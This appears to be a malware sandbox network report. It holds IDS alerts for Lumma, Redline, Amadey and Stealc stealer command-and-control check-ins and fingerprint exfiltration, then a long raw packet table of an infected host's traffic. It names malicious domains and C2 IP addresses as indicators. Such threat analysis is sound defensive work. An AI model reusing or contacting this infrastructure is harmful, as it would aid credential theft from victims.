                                                                          2024-09-27T04:21:44.366238+02002056159ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)1192.168.2.549772188.114.96.3443TCP
                                                                          2024-09-27T04:21:44.485367+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:44.650067+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:44.711706+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:44.935333+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549772188.114.96.3443TCP
                                                                          2024-09-27T04:21:44.935333+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549772188.114.96.3443TCP
                                                                          2024-09-27T04:21:45.150099+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:45.367800+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:45.407138+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549774185.215.113.1680TCP
                                                                          2024-09-27T04:21:45.410461+02002056157ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)1192.168.2.549775172.67.162.108443TCP
                                                                          2024-09-27T04:21:45.910489+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549775172.67.162.108443TCP
                                                                          2024-09-27T04:21:45.910489+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549775172.67.162.108443TCP
                                                                          2024-09-27T04:21:46.017818+02002056154ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)1192.168.2.5556651.1.1.153UDP
                                                                          2024-09-27T04:21:46.036192+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549774185.215.113.1680TCP
                                                                          2024-09-27T04:21:46.452161+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:46.529810+02002056155ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)1192.168.2.549777188.114.97.3443TCP
                                                                          2024-09-27T04:21:46.672609+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:46.892502+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:47.001883+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549777188.114.97.3443TCP
                                                                          2024-09-27T04:21:47.001883+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549777188.114.97.3443TCP
                                                                          2024-09-27T04:21:47.003766+02002056152ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)1192.168.2.5609641.1.1.153UDP
                                                                          2024-09-27T04:21:47.203326+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:47.422258+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:47.497422+02002056153ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)1192.168.2.549779188.114.96.3443TCP
                                                                          2024-09-27T04:21:47.718337+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:47.936019+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:47.966310+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549779188.114.96.3443TCP
                                                                          2024-09-27T04:21:47.966310+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549779188.114.96.3443TCP
                                                                          2024-09-27T04:21:48.022682+02002056150ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)1192.168.2.5556861.1.1.153UDP
                                                                          2024-09-27T04:21:48.389197+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:48.506040+02002056151ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)1192.168.2.549780172.67.208.139443TCP
                                                                          2024-09-27T04:21:48.954207+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549780172.67.208.139443TCP
                                                                          2024-09-27T04:21:48.954207+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549780172.67.208.139443TCP
                                                                          2024-09-27T04:21:50.680334+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549785185.215.113.1680TCP
                                                                          2024-09-27T04:21:51.541031+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549786104.21.2.13443TCP
                                                                          2024-09-27T04:21:51.541031+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549786104.21.2.13443TCP
                                                                          2024-09-27T04:21:53.673028+02002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.549782TCP
                                                                          2024-09-27T04:21:53.973182+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549782185.215.113.4380TCP
                                                                          2024-09-27T04:21:53.975115+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549791185.215.113.3780TCP
                                                                          2024-09-27T04:21:56.463262+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549796185.215.113.3780TCP
                                                                          2024-09-27T04:21:56.466873+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549782185.215.113.4380TCP
                                                                          2024-09-27T04:21:57.192672+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549799185.215.113.10380TCP
                                                                          2024-09-27T04:22:01.219170+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549782185.215.113.4380TCP
                                                                          2024-09-27T04:22:02.175425+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549812185.215.113.1680TCP
                                                                          2024-09-27T04:22:07.424305+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549782185.215.113.4380TCP
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Sep 27, 2024 04:21:02.398271084 CEST4971080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:02.403297901 CEST8049710185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:02.403422117 CEST4971080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:02.403605938 CEST4971080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:02.408412933 CEST8049710185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:03.109658957 CEST8049710185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:03.109743118 CEST4971080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:03.112271070 CEST4971080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:03.117149115 CEST8049710185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:03.372349024 CEST8049710185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:03.372363091 CEST8049710185.215.113.16192.168.2.5
                                                                          Sep 27, 2024 04:21:03.372462034 CEST4971080192.168.2.5185.215.113.16
                                                                          Sep 27, 2024 04:21:03.426042080 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:03.438724041 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:03.438826084 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:03.440666914 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:03.445535898 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.166862965 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.166896105 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.166908979 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.166918993 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.166929960 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.166939974 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.166954041 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.166960955 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.167015076 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.167028904 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.167032957 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.167046070 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.167057037 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.167079926 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.167099953 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.171957016 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.171977997 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.172036886 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.172071934 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.290916920 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.290937901 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.290949106 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.290960073 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.290971994 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.291027069 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.291043997 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.291055918 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.291126013 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.291172028 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.291611910 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.291649103 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.291661024 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.291663885 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.291706085 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.291739941 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.291757107 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.291796923 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.291831017 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.292344093 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.292392969 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.292393923 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.292407990 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.292435884 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.292452097 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.292476892 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.292490005 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.292501926 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.292521954 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.292546034 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.293425083 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.293437958 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.293443918 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.293482065 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.296113014 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.296123028 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.296164036 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.296181917 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.299179077 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.299237013 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.549366951 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.549386024 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.549402952 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.549417019 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.549429893 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.549449921 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.549460888 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.549473047 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.549484968 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.549530029 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.549609900 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.549612999 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.549627066 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.549638033 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.549649000 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.549659967 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.549662113 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.549685955 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.549715996 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.549757957 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.549770117 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.549781084 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.549798965 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.549830914 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.549941063 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.549952030 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.549962997 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.549988031 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.550019979 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.550095081 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550107002 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550153017 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.550259113 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550271988 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550282001 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550295115 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550306082 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550314903 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.550319910 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550333977 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550338984 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.550345898 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550359011 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550360918 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.550373077 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550379992 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.550403118 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.550435066 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.550548077 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550559998 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550570965 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550582886 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550594091 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550605059 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.550606012 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550627947 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.550657988 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.550709009 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550723076 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550734043 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550745964 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550756931 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550760984 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.550769091 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550781965 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550785065 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.550796032 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.550802946 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.550821066 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.550851107 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.551181078 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.551234007 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.551342964 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.551414967 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.554826975 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.554838896 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.554850101 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.554861069 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.554872036 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.554884911 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.554891109 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.554929972 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.554929972 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.554977894 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.554991007 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.555001974 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.555032015 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.555063963 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.555166006 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.555177927 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.555187941 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.555200100 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.555212975 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.555219889 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.555257082 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.555257082 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.555310011 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.555357933 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.555998087 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.556010008 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.556021929 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.556056976 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.556091070 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.556144953 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.556157112 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.556168079 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.556180000 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.556200981 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.556233883 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.556291103 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.556303978 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.556341887 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.557060003 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.557070971 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.557081938 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.557111979 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.557147026 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.557200909 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.557213068 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.557224035 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.557235003 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.557246923 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.557246923 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.557280064 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.557313919 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.557331085 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.557374001 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.557842970 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.557854891 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.557867050 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.557878017 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.557888985 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.557894945 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.557900906 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.557914019 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.557917118 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.557945967 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.557977915 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.557981968 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.557995081 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.558022976 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.558069944 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.559653044 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.559664965 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.559674978 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.559712887 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.559727907 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.559732914 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.559741020 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.559752941 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.559758902 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.559770107 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.559773922 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.559797049 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.559844017 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.559916019 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.559927940 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.559937954 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.559967041 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.559999943 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.560010910 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.560023069 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.560040951 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.560053110 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.560055017 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.560066938 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.560075998 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.560080051 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.560105085 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.560126066 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.560798883 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.560847998 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.560854912 CEST4971180192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:04.560859919 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.560875893 CEST8049711185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:04.560889006 CEST8049711185.215.113.117192.168.2.5
